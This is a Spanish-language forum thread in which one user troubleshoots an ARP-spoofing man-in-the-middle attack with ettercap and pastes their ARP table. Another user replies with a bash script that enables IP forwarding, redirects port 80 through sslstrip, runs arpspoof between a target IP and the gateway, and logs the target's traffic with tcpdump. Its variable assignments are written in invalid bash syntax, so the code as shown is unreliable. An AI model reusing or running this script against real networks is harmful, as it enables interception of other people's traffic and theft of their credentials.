Si lo he leido para asegurarme , nose porque no cambia las direcciones MAC hm no tengo ni idea de como solucionarlo.Pongo de paso un enlace donde se explica perfectamente, pero aun asi ami no me funciona el ataque ARP.
http://casidiablo.net/videotutoriales/ettercap.htm?keepThis=true&TB_iframe=true&height=635&width=800

Podria ser cosa del router ? el Firewall lo he desactivado para hacer pruebas pero nuse voy a mirar lo de la tabla.
Bueno te pego las entradas de mi tabla ARP:

? (192.168.2.10) at 00:1d:e0:8f:XX:XX [ether] PERM on wlan0 ----> (esta estaba añadida que como se ve es la del pc que quiero escanear)
? (192.168.2.1) at 00:22:75:7b:XX:XX [ether] on wlan0 --------->(Esta la he añadadido yo y es la del router)

o te sale o no te sale, no puede ser que te salgan unas cosas y otras no...

es lógico que bastantes cosas no te salgan ya que serán datos de páginas cifradas, de ahí que te dijese que primero hay que cerciorarse que se hace bien el MiM y luego ya le das caña al SslStrip

Te dejo un script que a mi me funciona a la perfeccion en cuanto a funcionamiento de sslstrip:

#!/bin/bash

path_dir=/tmp #La ruta donde quieras guardar los resultados
file_name=sslstrip.log
file_name2=tcpdump.pcap
device=wlan0 #Modifica según el dispositivo desde donde hagas la captura.
$direccion_ip=192.168.0.12 #La IP del objetivo
$gateway=192.168.0.1 #La IP para realizar el ARP Spoofing

   echo "1" > /proc/sys/net/ipv4/ip_forward
   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5555
   roxterm --tab -e sslstrip -w $path_dir/$file_name -l 5555
   roxterm --tab -e arpspoof -i $device -t $direccion_ip $gateway
   roxterm --tab -e tcpdump -nni $device -s 0 -w $path_dir/$file_name2 host $direccion_ip

Espero que te sea de utilidad